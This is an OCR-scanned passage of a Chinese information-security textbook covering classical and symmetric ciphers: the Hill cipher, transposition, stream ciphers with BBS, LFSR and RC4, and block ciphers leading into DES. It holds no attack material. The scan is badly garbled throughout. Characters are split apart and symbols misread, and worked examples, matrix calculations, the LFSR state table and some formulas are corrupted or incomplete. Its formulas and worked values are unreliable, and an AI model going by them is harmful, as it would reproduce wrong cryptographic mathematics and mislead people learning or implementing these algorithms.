cz 一 12 十 14(mod 26)=0—>a 


团 p=s™>18,kn=e—>4 


18 十 4Cmod 26)=22—>w 


即 密 文 为 c 


C21 


clcz…c 一 C ALZ POFGFLW MT LKG GTICW 。 
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(3) Hill 密码 。Hill 密码 是 由 数学 家 Lester Hill 于 1929 年 研制 的 , 它 也 是 一 种 多 表 密 
码 , 实 际 上 它 是 仿 射 密码 技术 的 特例 。 其 基本 加 密 思想 将 个 明文 字母 通过 线性 变换 ,将 它 
们 转换 为 n 个 密 文字 母 。 解 密 只 需 做 一 次 逆 变 换 即 可 。 

算法 的 密 钥 KK 二 {2Zss 上 的 nXn 可 道 和 矩阵 } ,明文 M 与 密 文 C 均 为 n 维 向 量 , 记 为 : 


7721 C1 ky Ra … Rn 
m k k Ra 
M=| .|, c=| |， 开 = [kg] =|” ” . 
Tn Cn km Ra kam 
其 中 ， 
cl = kum 十 kizms + km, mod 26 


ca = kam 十 kzzmz 二 "kom, mod 26 


cn = kam 十 Ra27122 二 "二 knmn mod 26 
或 写成 C=K.， M(mod 26) 。 
解密 变换 则 为 M=K™* 。，C(mod 26)。 
其 中 ,K-! 为 K 在 模 26 上 的 逆 矩 阵 , 满 足 KK-! = 二 K-'!K= 二 I (mod 26), 这 里 工 为 单位 
和 矩阵。 


[ 例 3-6] 设 明文 消息 为 good .试用 一 2, 密 铜 天 一 | 


密 , 然 后 再 进行 解密 。 
解 : 将 明文 划分 为 两 组 , 即 (g,.o) 和 (o,d), 即 (6,14) 和 (14,3)。 加 密 过 程 为 ， 


湛 m1 ll 81r$ 178 22 w 
| |- x| 上 |- | | 上 |- | 上 = | | (mod 20=| | 
Cs 7772 116 ey m 
Cs ms 11 8][14 178 22 w 
[Fe be i 
cs ma 号 了 且 剖 63 Bi i 
因此 ,good 的 加 密 结 果 为 WMWL。 显 然 , 明 文 不 同位 置 的 字母 “o" 加 密 成 的 密 文字 母 


不 同 。 为 了 解密 ,由 前 面 计算 得 天 一 | 2 


m1 Cl i .| 370 6 8 
一 下 1 一 一 E (mod 26) 一 
m2 C2 23 11 儿 地 638 14 0 
ms i[ cs 7 181][22 352 14 0 
=K = = 三 (mod 26)=> 
ma ca 23 11jJL1l 627 3 d 


因此 ,解密 得 到 正确 的 明文 为 *good”。 

Hill 密码 特点 如 下 。 

(1) 可 以 较 好 地 抑制 自然 语言 的 统计 特性 ,不 再 有 单字 母 蔡 换 的 一 一 对 应 关系 ,对 抗 
“ 唯 密 文 攻击 ”有 较 高 安全 强度 。 

(2) 密 钥 空间 较 大 ,在 忽略 密 钥 和 矩阵 K 可 逆 限 制 条 件 下 , | K | 二 26””。 

(3) 易 受 已 知 明文 攻击 及 选择 明文 攻击 。 


11 


7 | 的 Hill 密码 对 其 进行 加 


|- 可 咎 密 文 解密 计算 出 明文 ， 


第 3 章 信息 加 密 技 术 45 


3.3.2 置换 密码 


置换 密码 (permutation cipher) 加 密 过 程 中 明文 的 字母 保持 相同 ,但 顺序 被 打 乱 了 ,又 
被 称 为 换 位 密码 。 在 这 里 介绍 一 种 较 常 见 的 置换 处 理 方法 : 将 明文 按 行 写 在 一 张 格 纸 上 ， 
然后 再 按 列 的 方式 读 出 结果 , 即 为 密 文 ; 为 了 增加 变换 的 复杂 性 ,可 以 设 定 读 出 列 的 不 同 次 
序 ( 该 次 序 即 为 算法 的 密 钥 ) 。 

【 例 3-7】 明文 为 cryptography is an applied science, 假 设 密 钥 为 creny, 用 换 位 加 密 方 

解 : 根据 密 钥 creny 中 各 个 字母 在 英文 字母 表 中 的 出 现 次 序 可 确定 其 排序 为 14235( 即 
c 第 1 个 出 现 ,r 第 4 个 出 现 ,…,y 第 5 个 出 现 )。 将 明文 按照 密 钥 的 长 度 (5 个 字符 ) 逐 行列 
出 ,如 表 3-6 所 示 。 


表 3-6 置换 表 
1 4 2 3 Ey 
c 六 y p t 
o g r a p 
h y i s a 
n a p p 1 
i e d s 
i e n c e 


然后 依照 密 钥 决定 的 次 序 按 列 依次 读 出 ,因此 , 密 文 为 COHNII YRIPDN PASPSC 
RGYAEE TPALCE。 

在 置换 密码 中 ,明文 的 字母 相同 ,但 出 现 的 顺序 被 打 乱 了 ,经 过 多 步 置换 会 进一步 打 乱 
字母 顺序 。 但 由 于 密 文 字符 与 明文 字符 相同 , 密 文 中 字母 的 出 现 频率 与 明文 中 字母 的 出 现 
频率 相同 ,密码 分 析 者 可 以 很 容易 地 辨别 。 如 果 将 置换 密码 与 其 他 密码 技术 结合 , 则 可 以 得 
出 十 分 有 效 的 密码 编码 方案 。 


3.4 对 称 密码 体制 


对 称 密码 体制 (symmetric encryption) 也 称 为 秘密 密 钥 密码 体制 . 单 密 钥 密码 体制 或 常 
规 密码 体制 ,其 模型 如 图 3-4 所 示 。 如 果 一 个 密码 算法 的 加 密 密 钥 和 解密 密 钥 相同 ,或 者 由 
其 中 一 个 很 容易 推导 出 另 一 个 ,该 算法 就 是 对 称 密码 算法 ,满足 关系 M= Dx (C) = 
DrkCEk(CM))。 

一 个 攻击 者 (密码 分 析 者 ) 能 基于 不 安全 的 公开 信道 观察 密 文 C, 但 不 能 接触 到 明文 M 
或 密 钥 K ,他 可 以 试图 恢复 明文 M 或 密 钥 开 。 假 定 他 知道 加 密 算法 E 和 解密 算法 了 ,只 对 
当前 这 个 特定 的 消息 感 兴趣 , 则 努力 的 焦点 是 通过 产生 一 个 明文 的 估计 值 M' 来 恢复 明文 
M。 如 果 他 也 对 读 取 未 来 的 消息 感 兴趣 ,就 需要 通过 产生 一 个 密 钥 的 估计 值 K' 来 恢复 密 钥 
K ,这 是 一 个 密码 分 析 的 过 程 。 
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asdnfal 


6: 
E eB EB Be 6 


图 3-4 ”对称 密码 模型 


对 称 密码 体制 的 安全 性 主要 取决 于 两 个 因素 : 一 是 加 密 算法 必须 足够 安全 ,使 得 不 必 
为 算法 保密 , 仅 根据 密 文 就 能 破译 出 消息 是 计算 上 不 可 行 的 ; 二 是 密 钥 的 安全 性 , 即 密 钥 必 
须 保密 并 保证 有 足够 大 的 密 钥 空间 。 对 称 密码 体制 要 求 基于 密 文 和 加 密 /解密 算法 的 知识 
能 破译 出 消息 的 做 法 在 计算 上 是 不 可 行 的 。 

对 称 密码 算法 的 优 缺 点 如 下 。 

(1) 优点 : 加 密 、 解 密 处 理 速度 快 ,保密 度 高 等 。 

(2) 缺点 : 四 密 钥 是 保密 通信 安全 的 关键 ,发 信 方 必须 安全 、 妥 善 地 把 密 钥 护送 到 收 
信 方 ,不 能 泄露 其 内 容 。 如 何 才 能 把 密 钥 安全 地 送 到 收 信 方 ,是 对 称 密码 算法 的 突出 问 
题 。 对 称 密码 算法 的 密 钥 分 发 过 程 复杂 ,所 花 代价 高 ; @ 多 人 通信 时 密 钥 组 合 的 数量 会 
出 现 爆炸 性 膨胀 ,使 密 钥 分 发 更 加 复杂 化 ,车 有 N 个 用 户 进行 两 两 通信 ,总 共 需 要 的 密 钥 数 
为 NC(N 一 1)/2 个 ; @ 通 信 双 方 必须 统一 密 钥 ,才能 发 送 保密 的 信息 。 如 果 发 信人 与 收 信人 
素 不 相识 ,这 就 无 法 向 对 方 发 送 秘密 信息 了 ; @ 除 了 密 钥 管理 与 分 发 问题 外 ,对 称 密码 算法 
还 存在 数字 签名 困难 问题 (通信 双方 拥有 同样 的 消息 ,接收 方 可 以 伪造 签名 ,发 送 方 也 可 以 
否认 发 送 过 某 消 息 ) 。 

对 称 密码 体制 分 为 两 类 : 一 类 是 对 明文 的 单个 位 (或 字 节 ) 进 行 运算 的 算法 , 称 为 序列 
密码 算法 ,也 称 为 流 密码 算法 (stream cipher); 另 一 类 是 把 明文 信息 划分 成 不 同 的 块 ( 或 小 
组 ) 结 构 ,分别 对 每 个 块 (或 小 组 ) 进 行 加 密 和 解密 , 称 为 分 组 密码 算法 (Block cipher) 。 


3.4.1 序列 密码 


序列 密码 是 将 明文 划分 成 单个 位 (如 密 钥 流 序列 =hk…h… 
数字 0 或 1) 作 为 加 密 单 位 产生 明文 序列 ， 
然后 将 其 与 密 钥 流 序列 逐 位 进行 模 2 加 运 
算 , 用 符号 表示 为 中 ,其 结果 作为 密 文 的 方 
法 。 加 密 过 程 如 图 3-5 所 示 。 

加 密 算法 : ci 二 mi 十 ki(mod 2)。 图 3-5 序列 密码 加 密 过 程 

解密 算法 : mi 二 ci 十 ki(mod 2)。 

【 例 3-8】 设 明文 序列 M 是 一 串 二 进 制 数据 M 二 (101011001111000011111111);, 密 钥 
K=(111100001111000011110000),, 则 

加 密 过 程 : C=M 十 K(mod 2) 一 (010111000000000000001111)，。 

解密 过 程 : MC 十 K(mod 2) 王 (101011001111000011111111)，。 

序列 密码 分 为 同步 序列 密码 和 自 同步 序列 密码 两 种 。 同 步 序 列 密码 要 求 发 送 方 和 接收 
方 必须 是 同步 的 ,在 同样 的 位 置 用 同样 的 密 钥 才能 保证 正确 的 解密 。 如 果 在 传输 过 程 中 密 


明文 序列 m=mma…mn"… 人、 密 文 序列 c=cicz*…cn*… 
| 二 
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文 序列 有 被 算 改 .删除 .插入 等 错误 导致 同步 失效 , 则 不 可 能 成 功 解密 ,只 能 通过 重新 同步 来 
实现 解密 ,恢复 密 文 。 在 传输 期 间 , 一 个 密 文 位 的 改变 只 影响 该 位 的 恢复 ,不 会 对 后 继 位 产 
生 影响 。 自 同步 序列 密码 密 钥 的 产生 与 密 钥 和 已 产生 的 固定 数量 的 密 文 位 有 关 , 因 此 , 密 文 
中 产生 的 一 个 错误 会 影响 到 后 面 有 限 位 的 正确 解密 。 所 以 , 自 同步 密码 的 密码 分 析 比 同步 
密码 的 密码 分 析 更 加 困难 。 
序列 密码 具有 实现 简单 便于 硬件 计算 .加 密 与 解密 处 理 速度 快 、 低 错误 (没有 或 只 有 有 
限 位 的 错误 ) 传 播 等 优点 ,但 同时 也 暴露 出 对 错误 的 产生 不 敏感 的 缺点 。 序 列 密码 涉及 大 量 
的 理论 知识 ,许多 研究 成 果 并 没有 完全 公开 ,这 也 许 是 因为 序列 密码 目前 主要 用 于 军事 和 外 
交 等 机 要 部 门 的 缘故 。 目 前 ,公开 的 序列 密码 主要 有 RC4 SEAL 等 。 
序列 密码 的 安全 强度 依赖 于 密 钥 流产 生 器 所 产生 的 密 钥 流 序 列 的 特性 ,关键 是 密 钥 生 
成 器 的 设计 及 收发 两 端 密 钥 流 产生 的 同步 技术 。 
1. 伪 随 机 序列 
在 序列 密码 中 ,一 个 好 的 密 钥 流 序 列 应 该 满足 : 具有 良好 的 伪 随 机 性 ,如 极 大 的 周期 、 
极 大 的 线性 复杂 度 .序列 中 0 和 1 的 分 布 均匀 ; 产生 的 算法 简单 ; 硬件 实现 方便 。 
产生 密 钥 流 序列 的 一 种 简单 方法 是 使 用 自然 现象 随机 生成 ,如 半导体 电阻 器 的 热 噪 声 、 
公共 场所 的 噪声 源 等 。 还 有 一 种 方法 是 使 用 软件 以 简单 的 数学 函数 来 实现 ,如 标准 C 语言 
库 函 数 中 的 randO 〇 函数 , 它 可 以 产生 介 于 0~~65 535 的 任何 一 个 整数 ,以 此 作为 “种 子 ” 输 
和 人 ,随后 再 产生 比特 流 。rand() 建 立 在 一 个 线性 同 余生 成 器 的 基础 上 ,如 ,二 ak,-i 十 
b(mod m) ,ko 作为 初始 值 ,a、b 和 m 都 是 整数 。 但 这 只 能 作为 以 实验 为 目的 的 例子 ,不 能 满 
足 密码 学 意义 上 的 要 求 。 
产生 伪 随 机 数 的 一 个 不 错 的 选择 是 使 用 数论 中 的 难题 。 最 常用 的 是 BBS 伪 随 机 序列 
生成 器 。 首 先 产 生 两 个 大 素数 p 和 g, 且 p 二 q 二 3(mod 4) , 设 2 一 dg ,并 选择 一 个 随机 整数 
Xx, 与 n 是 互 素 的 , 且 设 初始 输入 zo 二 x* (mod n),BBS 通过 如 下 过 程 产生 一 个 随机 序列 
i 
(1) xz;=Zz;-1(mod n)。 
(2) b; 是 zi 的 最 低 有 效 比 特 。 
例如 , 设 p= 二 24672462467892469787 和 q 一 396736894567834589803 , 则 
7 一 9788476140853110794168855217413715781961 
令 z= 二 873245647888478349013, 则 初始 输入 
xzo 一 zzmod n=8845298710478780097089917746010122863172 
ZX1,T2，"… ,Xs 的 值 分 别 为 : 
zi 一 7118894281131329522745962455498123822408 
zz 一 3145174608888893164151380152060704518227 
zs 一 4898007782307156233272233185574899430355 
心 一 3935457818935112922347093546189672310389 
xs 一 675099511510097048901761303198740246040 
ze =4289914828771740133546190658266515171326 
zx1 =4431066711454378260890386385593817521668 
zs=7336876124195046397414235333675005372436 
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取 上 述 任意 一 个 比特 串 , 当 > 的 值 为 奇数 时 ,2 的 值 取 1; 当 z 的 值 为 偶数 时 ,2 的 值 取 
0, 故 产生 的 随机 序列 651,65;,… ,bs 二 0,1,1,1,0,0,0,0。 可 见 , 产 生 密 钥 流 序列 的 方法 很 多 ， 
常见 的 方法 有 线性 同 余 法 ,线性 反馈 移 位 寄存 器 、 非 线性 反馈 移 位 寄存 器 有 限 自动 机 和 混 
沌 密码 等 。 

2. 线性 反馈 移 位 寡 存 器 


通常 ,产生 密 钥 流 序列 的 硬件 是 反馈 移 位 寄存 器 。 一 个 反馈 移 位 寄存 器 由 两 部 分 组 成 ; 
移 位 寄存 器 和 反馈 函数 ,如 图 3-6 所 示 。 i 

移 位 寄存 器 由 个 寄存 器 组 成 ,每 个 寄存 器 To 一 Ta | 
只 能 存储 一 个 位 ,在 一 个 控制 时 钟 周期 内 ,根据 | | | 多 的 
寄存 器 当前 的 状态 计算 反馈 函数 Fa ,as ，…， a 


an) 作 为 下 一 时 钟 周期 的 内 容 ,每 次 输出 最 右 端 一 
位 w ,同时 ,寄存 器 中 所 有 位 都 右 移 一 位 ,最 左 端 网 
的 位 由 反馈 函数 计算 得 到 。ai() 表 示 t 时 刻 第 i 
个 寄存 器 的 内 容 , 用 ai(t 十 1) 表 示 ai;(z) 下 一 时 刻 的 内 容 , 则 有 
移 位 : 
ai(t+1)=an(t), i=1,2,,n—1 
反馈 ， 
an(t 十 1) = f(al(t) ,az(t) an(Ct)) 

如 果 反 馈 函 数 f(a ,az ,an) 一 所 ao 四 aa 由 … 中 必 ai ,其 中 E10,1}), 则 该 反馈 函 
数 是 ui ,as，,… a, 的 线性 函数 ,对 应 的 反馈 移 位 寄存 器 称 为 线性 反馈 移 位 寄存 器 (Linear 
Feedback Shift Register, LFSR)., 

【 例 3-9】 设 线性 反馈 移 位 寄存 器 为 

ai 十 1) =amn(t), i=1,2,3,4 
at 十 1) 一 ai) Bat) 

对 应 (Ai ,Rs ,lsAi) 一 (0,1,0,1), 设 初始 状态 为 (al ,azyasya) 一 (0,1,1,1), 各 个 时 刻 
的 状态 如 表 3-7 所 示 。 


表 3-7 LFSR 在 不 同时 刻 的 状态 


t as as aa a 


0 1 1. L 0 
Y 1 出 1 1 
2 0 1 1 和 
3 0 0 1 
4 1 0 0 L 
5 1 1 0 0 
6 1 1 0 
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由 表 3-7 可 知 ,t=6 时 的 状态 恢复 到 :一 0 时 的 状态 , 且 往 后 循环 。 因 此 ,该 反馈 移 位 寄存 
器 的 周期 是 6, 输 出 序列 为 0111100…, 表 中 对 应 w 的 状态 。 本 例 中 , 若 反馈 函数 为 ws (t 十 1) 一 
ea (Das (CD , 则 周期 达到 15, 输 出 序列 为 0110010001111010…。 对 于 4 级 线性 反馈 移 位 寄 
存 器 而 言 ,所 有 可 能 状态 为 2 一 16 种 ,除去 全 0 状态 ,最 大 可 能 周期 为 15。 对 于 级 线性 反 
馈 移 位 寄存 器 ,不 可 能 产生 全 0 状态 ,因此 ,最 大 可 能 周期 为 2 一 1, 而 能 够 产生 最 大 周期 的 
LFSR 是 必需 的 ,这 就 要 求 线性 反馈 函数 符合 一 定 的 条 件 。 关 于 随机 序列 的 周期 及 线性 复 
杂 度 的 有 关 知 识 , 需 要 读者 具备 一 定 的 数学 基础 ,本 书 不 再 展开 讨论 。 

选择 线性 反馈 移 位 寄存 器 作为 密 钥 流 生 成 器 的 主要 原因 有 : 适合 硬件 实现 ; 能 产生 大 
的 周期 序列 ; 能 产生 具有 良好 的 统计 特性 的 序列 ; 它 的 结构 能 够 应 用 代数 方法 进行 很 好 的 
分 析 。 实 际 应 用 中 ,通常 将 多 个 LFSR 组 合 起 来 构造 非 线 性 反馈 移 位 寄存 器 ,n 级 非 线 性 反 
馈 移 位 寄存 器 产生 伪 随 机 序列 的 周期 最 大 可 达 2" ,因此 ,研究 产生 最 大 周期 序列 的 方法 具 
有 重要 意义 。 

3. RC4 


RC4 是 由 麻 省 理工 学 院 的 Ron Rivest 教授 在 1987 年 为 RSA 公司 设计 的 一 种 可 变 密 
钥 长 度 .面向 字 节 流 的 序列 密码 。RC4 是 目前 使 用 最 广泛 的 序列 密码 之 一 ,已 应 用 于 
Microsoft Windows、Lotus Notes 和 其 他 应 用 软件 中 ,特别 是 应 用 到 SSL 协议 和 无 线 通信 
方面 。 

RC4 算法 很 简单 , 它 以 一 个 数据 表 为 基础 ,对 表 进 行 非 线 性 变换 ,从 而 产生 密码 流 序 
列 。RC4 包含 两 个 主要 算法 : 密 钥 调度 算法 (Key-Scheduling Algorithm,KSA) 和 伪 随 机 生 
成 算法 (Pseudo Random Generation Algorithm,PRGA) 。 

KSA 的 作用 是 将 一 个 随机 密 钥 (大 小 为 40 一 256 位 ) 变 换 成 一 个 初始 置换 表 S。 过 程 
如 下 。 

(1) S 表 中 包含 256 个 元 素 SL0] 一 S[L255] ,对 其 初始 化 , 令 S[ 引 =i,0 志 i 二 255。 

(2) 用 主 密 钥 填充 字符 表 K ,如果 密 钥 的 长 度 小 于 256B, 则 依次 重复 填充 ,直至 将 K 填 
满 ,K 王 (天 [ 朴 ,0 委 i 委 255)。 

(3) 令 j=0。 

(4) 对 于 i 从 0 到 255 循环 : 

©@ j=j+5S[i+K[ij(mod 256) 。 

@ 交换 S[ 疏 和 SLj]。 

PRGA 的 作用 是 从 S 表 中 随机 选取 元 素 ,并 产生 密 钥 流 。 过 程 如 下 。 

(1) i=0,j=0。 

(2) ;一 i 十 1(mod 256) 。 

(3) j=j+S[i](mod 256) 。 

(4) 交换 S[ 订 和 S[j]。 

(5) t=S[i]+SLj](mod 256) 。 

(6) 输出 密 钥 字 二 SLt]。 

虽然 RC4 要 求 主 密 钥 至 少 为 40 位 ,但 为 了 保证 安全 强度 ,目前 至 少 要 达到 128 位 。 


50 信息 安全 与 技术 (第 2 版 ) 


3.4.2 分 组 密码 


设 明 文 消 息 被 划分 成 若干 固定 长 度 的 组 x 二 Gm ym,… 1m) ,其 中 ;二 0 或 1,1 二 1,2,…,n， 
每 一 组 的 长 度 为 ”各 组 分 别 在 密 钥 一 (Ai ,ks,…,k,) 的 作用 下 变换 成 长 度 为 的 密 文 分 组 
< 一 (cyc,…'cr)。 分 组 密码 的 模型 如 图 3-7 所 示 。 


AD) AD) 


m=(m1sm2,° an) | C=(c1,c2,°"",07) | JI 一 (0712， Hn) 
一 | 业 罕 算 站 | 一 | 解 农 党 涛 | 一 
A 


图 3-7 分 组 密码 模型 


分 组 密码 的 本 质 就 是 由 密 钥 一 (Ai ,ks，…,k,) 控 制 的 从 明文 空间 M( 长 为 n 的 比特 串 
的 集合 ) 到 密 文 空间 C( 长 为 r 的 比特 串 的 集合 ) 的 一 个 一 对 一 映射 。 为 了 保证 密码 算法 的 
安全 强度 ,加 密 变换 的 构造 应 遵循 下 列 几 个 原则 。 

(1) 分 组 长 度 足 够 大 。 当 分 组 长 度 n 较 小 时 ,容易 受到 暴力 穷 举 攻击 ,因此 要 有 足够 大 
的 分 组 长 度 来 保证 足够 大 的 明文 空间 ,避免 给 攻击 者 提供 太 多 的 明文 统计 特征 信息 。 

(2) 密 钥 量 空 间 足 够 大 ,以 抵抗 攻击 者 通过 穷 举 密 钥 破译 密 文 或 获得 密 钥 信息 。 

(3) 加 密 变 换 足够 复杂 ,以 加 强 分 组 密码 算法 自身 的 安全 性 ,使 攻击 者 无 法 利用 简单 的 
数学 关系 找到 破译 缺口 。 

(4) 加 密 和 解密 运算 简单 ,易于 实现 。 分 组 加 密 算法 将 信息 分 成 固定 长 度 的 二 进 制 位 
串 进 行 变 换 。 为 便于 软 、 硬 件 的 实现 ,一 般 应 选取 加 法 .乘法 、. 异 或 和 移 位 等 简单 的 运算 ,以 
避免 使 用 逐 比 特 的 转换 。 

(5) 加 密 和 解密 的 多 辑 结构 最 好 一 致 。 如 果 加 密 、 解 密 过 程 的 算法 逻辑 部 件 一 致 ,那么 
加 密 、 解 密 可 以 由 同一 部 件 实现 ,区 别 在 于 所 使 用 的 密 钥 不 同 ,以 简化 密码 系统 整体 结构 的 

古典 密码 中 最 基本 的 变换 是 替代 和 置换 ,其 目的 是 产生 尽 可 能 混乱 的 密 文 。 分 组 密码 
同样 离 不 开 这 两 种 最 基本 的 变换 ,替代 变换 就 是 经 过 复杂 的 变换 关系 将 输入 位 进行 转换 , 记 
为 S, 称 为 S 盒 ; 移 位 变换 就 是 将 输入 位 的 排列 位 置 进行 变换 , 记 为 P, 称 为 P 盒 ,如 图 3-8 
所 示 。 


替代 置换 


oo--—-ooo 
Eg 
co---ooo 
eoo--9 


3S 盒 P 盒 
图 3-8 两 种 基本 变换 


分 组 密码 由 多 重 S 盒 和 己 盒 组 合 而 成 。S 盒 的 直接 作用 是 将 输入 位 进行 某 种 变换 ,以 
起 到 混乱 的 作用 ; P 盒 的 直接 作用 就 是 移动 输入 位 的 排列 位 置 关 系 , 以 起 到 扩散 的 作用 。 
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分 组 密码 算法 就 是 采用 “混乱 与 扩散 ”两 个 主要 思想 进行 设计 的 ,这 是 Shannon 为 了 有 效 抵 
抗 攻 击 者 对 密码 体制 的 统计 分 析 提 出 的 基本 设计 思想 ,也 可 以 认为 是 分 组 密码 算法 设计 的 
基本 原理 。 实 现 分 组 密码 算法 设计 的 具体 操作 包括 以 下 3 个 方面 。 

(1) 替代 。 和 替代 是 指 将 明文 位 用 某 种 变换 关系 变换 成 新 的 位 ,以 使 所 产生 的 密 文 是 一 
堆 杂 乱 无 章 的 乱码 ,这 种 变换 与 明文 和 密 钥 密 切 相关 ,要 求 尽 可 能 地 使 密 文 与 明文 和 密 钥 之 
间 的 关系 十 分 复杂 ,使 破译 者 很 难 从 中 发 现 规律 和 依赖 关系 ,从 而 加 强 隐蔽 性 。 在 分 组 密码 
算法 中 采用 复杂 的 非 线性 替代 变换 就 可 达到 比较 好 的 混乱 效果 。 

(2) 置换 。 置 换 是 指 让 明文 中 的 每 一 位 (包括 密 钥 的 每 一 位 ) 直 接 或 间接 影响 输出 密 文 
中 的 许多 位 ,即将 每 一 比特 明文 (或 密 钥 ) 的 影响 尽 可 能 迅速 地 作用 到 较 多 的 输出 密 文 位 中 ， 
以 便 达 到 隐蔽 明文 的 统计 特性 。 这 种 效果 也 称 为 “雪崩 效应 ”, 也 就 是 说 ,输入 即使 只 有 很 小 
的 变化 ,也 会 导致 输出 位 发 生 巨大 变化 。 分 组 密码 算法 设计 中 的 置换 操作 就 是 为 了 达到 扩 
散 的 目的 。 

(3) 乘积 变换 。 在 分 组 密码 算法 设计 中 ,为 了 增强 算法 的 复杂 度 ,常用 的 方法 是 采用 乘 
积 变换 的 思想 , 即 加 密 算 法 不 仅 是 简单 的 一 次 或 两 次 基本 的 S 盒 和 PP 盒 变换 ,而 是 通过 两 
次 或 两 次 以 上 S 盒 和 PP 盒 的 反复 应 用 ,也 就 是 迭代 的 思想 ,克服 单一 密码 变换 的 弱点 ,构成 
更 强 的 加 密 结果 ,以 强化 其 复杂 程度 。 后 面 介绍 的 一 些 分 组 密码 算法 ,无 一 例外 地 都 采用 了 
这 种 乘积 密码 的 思想 。 


3.4.3 ”数据 加 密 标准 (DES) 


20 世纪 60 年 代 末 ,IBM 公司 开始 研制 计算 机 密码 算法 ,在 1971 年 结束 时 提出 了 一 种 
称 为 Luciffer 的 密码 算法 , 它 是 当时 最 好 的 算法 ,也 是 最 初 的 数据 加 密 算法 。1973 年 美国 
国家 标准 局 (NBS, 现 在 的 美国 国家 标准 技术 研究 所 , NIST) 征 求 国家 密码 标准 方案 ,IBM 就 
提交 了 这 个 算法 。1977 年 7 月 15 日 ,该 算法 被 正式 采纳 作为 美国 联邦 信息 处 理 标准 生效 ， 
成 为 事实 上 的 国际 商用 数据 加 密 标 准 被 使 用 , 即 数据 加 密 标准 (Data Encryption Standard， 
DES) 。 当 时 规定 其 有 效 期 为 5 年 ,后 经 几 次 授权 续 用 ,真正 有 效 期 限 长 达 20 年 。 在 这 2 20 
年 中 ,DES 算法 在 数据 加 密 领 域 发 挥 了 不 可 替代 的 作用 。 进 入 20 世纪 90 年 代 以 后 ,由 于 
DES 密 钥 长 度 偏 短 等 缺陷 ,不断 受到 诸如 差分 密码 分 析 ( 由 以 色 列 密码 专家 Shamir 提出 ) 
和 线性 密码 分 析 ( 由 日 本 密码 学 家 Matsui 等 提出 ) 等 各 种 攻击 威胁 ,使 其 安全 性 受到 严重 的 
挑战 ,而 且 不 断 传 出 被 破解 的 消息 。 鉴 于 此 ,美国 国家 保密 局 经 多 年 授权 评估 后 认为 ,DES 
算法 已 没有 安全 性 可 言 。 于 是 NIST 决定 在 1998 年 12 月 以 后 不 再 使 用 DES 来 保护 官方 
机 密 , 只 推荐 作为 一 般 商 业 使 用 。1999 年 又 颁布 新 标准 ,并 规定 DES 只 能 用 于 遗留 密码 系 
统 , 但 可 以 使 用 加 密 的 3DES 加 密 算法 。 但 不 管 怎样 ,DES 的 出 现 推动 了 分 组 密码 理论 的 
研究 ,起 到 了 促进 分 组 密码 发 展 的 重要 作用 ,而 且 它 的 设计 思想 对 掌握 分 组 密码 的 基本 理论 
和 工程 应 用 有 着 重要 的 参考 价值 。 

1. DES 算法 加 密 过 程 

DES 对 64 位 的 明文 分 组 进行 操作 。 通 过 一 个 初始 置换 ,将 明文 分 组 分 成 左 半 部 分 和 
右 半 部 分 ,各 32 位 长 。 然 后 进行 16 轮 完 全 相同 的 运算 ,这些 运算 被 称 为 函数 f ,在 运算 过 
程 中 数据 与 密 钥 结合 。 经 过 16 轮 后 ,左右 半 部 分 合 在 一 起 ,经 过 一 个 末 置 换 ( 初 始 置 换 的 
逆 置 换 ) ,这 样 该 算法 就 完成 了 。DES 算法 的 加 密 过 程 如 图 3-9 所 示 。 
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DES 算法 的 特点 : @ 分 组 加 密 算法 ,以 64 位 为 分 组 ,64 位 一 组 的 二 
明文 从 算法 一 端 输入 ,64 位 密 文 从 另 一 端 输出 ; 加 对 称 算法 ,加 密 和 ] 
解密 用 同一 密 钥 ; @ 有 效 密 钥 长 度 为 56 位 , 密 钥 通常 表示 为 64 位 数 ， 一 二 一 
但 每 个 第 8 位 用 作 奇 偶 校 验 ,可 以 忽略 ; 四 替代 和 置换 ,DES 算法 是 两 
种 加 密 技术 的 组 合 一 一 先 替 代 后 置换 ; @ 易 于 实现 ,DES 算法 只 是 使 乘积 变换 
用 了 标准 的 算术 和 逻辑 运算 ,其 作用 的 数 最 多 也 只 有 64 位 ,因此 用 20 
世纪 70 年 代 末期 的 硬件 技术 很 容易 实现 。 闻 初 始 置 换 IP_ 

DES 算法 的 具体 加 密 过 程 如 下 。 

(1) 初始 置换 IP。 初 始 置换 方法 是 将 64 位 明文 的 位 置 顺序 打 乱 ， 
表 中 的 数字 代表 64 位 明文 的 输入 顺序 号 , 表 中 的 位 置 代表 置换 后 的 图 3-9 DES 算法 的 
输出 顺序 , 表 中 的 位 置 顺序 是 先 按 行 后 按 列 进行 排序 。 例 如 , 表 中 第 加 密 过 程 
一 行 第 一 列 的 数字 为 58, 表 示 将 原来 排 在 第 58 位 的 比特 位 排 在 第 1 
位 ; 第 一 行 第 二 列 的 数字 为 50, 表 示 将 原来 排 在 第 50 位 的 比特 位 排 在 第 2 位 ,依次 类 推 。 
不 妨 设 输入 位 序 为 moms…me ,初始 置换 后 变 为 mi722…7 三 mssmso…mr。 初 始 置 换 表 中 
的 位 序 特征 : 64 位 输入 按 8 行 8 列 进行 排列 ,最 右边 一 列 按 2、4、6、8 和 1、3、5、7 的 次 序 进 
行 排列 , 往 左边 各 列 的 位 序号 依次 紧邻 其 右边 一 列 各 序号 加 8, 如 图 3-10 所 示 。 


64 位 密 文 


58 50 42 34 | 26 18 10 | 2 
60 52 44 36 | 28 20 12 | 4 
62 54 46 38 | 30 22 14 | 56 
64 56 48 40 | 32 24 16 | 8 
57 49 41 33 | 25 17 9 | 1 
59 51 43 35 | 27 19 11 | 3 
61 53 45 37 | 29 21 1 | 考 
63 55 47 39 31 23 15 7 


图 3-10 初始 变换 IP 


(2) 乘积 变换 (16 轮 迭 代 )。 乘 积 变 换 部 分 要 进行 16 轮 和 迭代 ,如 图 3-11 所 示 。 将 初始 
置换 得 到 的 64 位 结果 分 为 两 半 , 记 为 L。 和 Ru .各 32 位 。 设 初始 密 钥 为 64 位 ,经 密 钥 扩展 
算法 产生 16 个 48 位 的 子 密 钥 , 记 为 Ki ,K,,… ,Ky ,每 轮 迭 代 的 逻辑 关系 为 

L; = Ri 
区 = La (Ry Re) 

其 中 1<i<16, 函 数 是 每 轮 变换 的 核心 变换 。 

(3) 道 初 始 置 换 IP-。 逆 初始 置换 IP- 与 初始 置换 正好 相反 ,如 图 3-12 所 示 。 例 如 ， 
处 在 第 1 位 的 比特 位 置换 后 排 在 第 58 位 ,处 在 第 2 位 的 比特 位 置换 后 排 在 第 50 位 。 道 初 
始 置换 后 变 为 mfms2…mhs 二 moms*…mzs 。 逆 初始 置换 表 中 的 位 序 特征 : 64 位 输入 依然 按 8 
行 8 列 进行 排列 ,1 一 8 按 列 从 下 往 上 进行 排列 ,然后 是 9 一 16 排 在 右边 一 列 , 依 次 进行 排 4 
